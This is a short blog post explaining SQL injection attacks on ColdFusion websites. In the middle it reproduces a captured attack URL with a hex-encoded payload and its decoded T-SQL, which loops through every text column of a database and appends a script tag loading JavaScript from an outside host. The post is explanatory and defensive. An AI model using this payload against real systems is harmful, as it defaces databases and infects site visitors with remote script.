Whatterz

What is a SQL Injection Attack

by Simon. Average Reading Time: about 2 minutes.

Over the past few weeks, subversive elements in the international arena have decided that attacking websites is a fun thing to do! The online world has become the new battle ground between nations vying to de-stabilise rivals. This may seem all very Jack Bauer, but we are increasingly seeing ‘SQL injection attacks’ eminating from countries such as Russia, China and North Korea. Of course, that doesn’t mean our countries aren’t doing the same in return, but we only see the results from foreign-based attacks.

What is a SQL Injection Attack?

SQL Injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Real World Example

SQL Injection attacks are commonly associated with a technique called Cross-Site Scripting (XSS). XSS is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

In reality, what does this look like?

The following is a legitimate URL that may be navigated to by the user agent:

http://www.domain.com/folderName/fileName.cfm?variable1=0&variable2=4241

The following is a hacked URL:

http://www.domain.com/folderName/filename.cfm?
variable1=0&variable2=4241;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C41524520405420766172636861722
8323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F522
0464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C7
56D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787479706
53D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204
F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E5
44F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E2065786563282775706461746
5205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697
074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272720776
865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D226874747
03A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854204
6524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736
F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

The code appended to the URL is hexadecimal. This can be interpreted by the SQL engine. When the hexadecimal string is decoded by the SQL server, the SQL code generated looks similar to the following:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR
FOR SELECT a.name,b.name from sysobjects a,syscolumns b
WHERE a.id=b.id
AND a.xtype='u'
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title>
<script src="http://1.verynx.cn/w.js"></script><!--''
where '+@C+' not like ''%"></title>
<script src="http://1.verynx.cn/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Somewhat unhelpfully, if the user credentials used to access the database have access to the system tables of your database, the SQL injection attack will be able to interrogate those system tables and determine the structure of your database. The result, of the above example, is that the following code is injected into every string-based column in every table.

</title><script src="http://1.verynx.cn/w.js"></script><!--

To put it simply, this is very bad news!

ColdFusion-hacking is Popularised

ColdFusion-based sites are by no means immune to this international ‘information war’. The popularity of attacks on ColdFusion-based websites can be summarised by the fact that an article was featured on The Hacker Webzine recently, detailing how to implement a successful attack.

How to ‘Fix’ the Problem

As ColdFusion developers we not only need to be aware of the problem, we need to also know how to fix the problem and mitigate against an attack before it even happens.

In my next post, I will discuss how to fix a SQL injection attack.

This article has been tagged

, , , , , , , , , , , , , , , ,

Other articles I recommend

SQL User-Defined Function: ListToTable

A common need in SQL is the ability to iterate over a list as if it were an array. In SQL it is not possible to declare arrays, unlike other programming languages such as ColdFusion, ActionScript and Java. Fortunately, there is a way around this problem: use a User-Defined Functions (UDFs) to create a tabular version of the data. Arrays are, after all, essentially tabular data (at their simplest, one dimension level).

SQL User-Defined Function: ReplaceChars

The SQL Replace function enables us to look for a certain character phrase in a string and replace it with another character phrase. The updated string is then returned by the function.

Preventing SQL Injection in an AIR Application

SQLite is a mostly ACID-compliant relational database management system contained in a relatively small (~500kB) C programming library. The Adobe AIR runtime includes the SQLite embedded database for use by Adobe AIR applications. This allows applications to run and store data locally and or synchronise the datastore with online repositories.